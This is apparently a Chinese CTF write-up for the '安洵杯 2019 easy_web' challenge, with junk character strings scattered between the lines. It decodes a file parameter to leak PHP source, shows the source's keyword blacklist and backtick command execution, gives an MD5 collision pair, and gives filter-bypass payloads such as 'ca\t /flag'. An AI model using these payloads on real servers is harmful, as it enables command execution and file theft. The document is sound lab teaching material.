[安洵杯 2019]easy_web

admin

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
' X- l) @7 t- `7 ~8 p5 O8 V<p>&nbsp;</p>
3 Q0 p( m9 l. u& X8 {$ Y<p>&nbsp;</p>
<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
2 k( w+ f3 V, K<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
# j, O6 g5 E/ T; H) E; i<p>&nbsp;</p>
<p>&nbsp;</p>
1 ?# N* s: z+ _9 I<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
$ C$ D& z* _- f. y<p>&nbsp;</p>
9 n) w3 o. m3 d! E6 j<p>&nbsp;</p>
<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
/ b1 D) n: W& [" g; |7 l<p>&nbsp;</p>
6 u& {9 X* H+ V5 ^9 u<p>&nbsp;</p>
) [* {9 w" a8 O3 [5 ~<p>&nbsp;然后用hex解码一下得到了</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
' _! f' |- v+ B* W</pre>
$ _) y# u0 e% C- O2 \! f</div>
* m0 i8 Z% u) r; a" r<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
' d0 W0 r" u/ \; q. r( ]) U<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
/ U! x, k( ^# h9 ?" Y1 y% w, U</pre>
</div>
<p>　　然后输入到地址栏</p>
<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
* L4 M; t  E! Z: q  c2 l2 n<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
" A& X- s) V3 [- g% [( v</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
- O3 o8 \# W% E. K* u, {+ \</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
" Y9 g% k, X  X9 `1 b* b</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));

& X. N: `# ~, A/ v/ J* g</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
/ u0 O" e0 V9 Y</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
" F+ x7 }$ V5 B} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
1 h+ t- H! }7 J' b+ a. i    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
1 s3 _" [% D& \) N$ q</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
& _3 @2 {0 o6 S6 p</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
* W2 ?/ W$ e% ~' o* q. G# E# {    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
. W+ K; [! I0 M1 x    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
4 c8 ~. j! P- M' ]} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
4 D4 |* r; c8 g+ Q8 F! I    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
; t2 Z5 u3 a: z5 }9 L    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
$ ~+ A: d4 o5 T- y( i) \. @) r    }
, M* \( [; s" ~) s* l}
2 \( X& c0 {3 F, n  g* \
</span>?&gt;
&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
+ W! M+ a9 g+ ~* e  body{
. b1 P1 e9 X! X; Y% ?; n   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
4 V& l4 g& t2 c; v) s8 y   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
* w" r# Z& v/ b% ?) n0 g, s! U/ W<span style="color: rgba(0, 0, 0, 1)">}
% q$ t) W/ n& c! c- }</span>&lt;/style&gt;
8 u1 l/ k( X2 [&lt;body&gt;
( C5 w, N" Q  q+ `&lt;/body&gt;
  T* }8 w- l& x3 G  K&lt;/html&gt;</pre>
</div>
<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
$ b& X! X' a1 h<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
* D$ `6 a3 P3 @6 k7 v9 Y4 @7 {+ s    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }</span></pre>
) H) L! i( a: v7 d</div>
2 N  g+ ^8 N9 u# ~<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
& C7 H, j6 A; Q* V2 O3 V! g, E</pre>
</div>
<div class="cnblogs_Highlighter">
! K4 y% J3 R( \2 A$ d& ?<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
0 q' \9 k9 B" v( ^2 y& g0 B</pre>
$ z; r. Z' l+ `8 [1 ?7 b</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
<p>于是采用payload:</p>
9 A: c+ @, N; ]  Z7 P1 _% \<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>&nbsp;</p>
. _' r! s; ?$ l5 K$ R<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
<p>ls和l\s在命令执行的时候结果是一样的。</p>
<p>然后发现根目录里面有/flag</p>
* o8 f) d  G, i6 K7 B4 s<p>于是payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
! F+ k$ z9 w1 E% D+ ^; f</pre>
; X: ~3 J' C! W& \1 r</div>
) X, F$ {5 S1 Z<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
  N& y& [/ j& t) L5 }<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
<p>&nbsp;</p>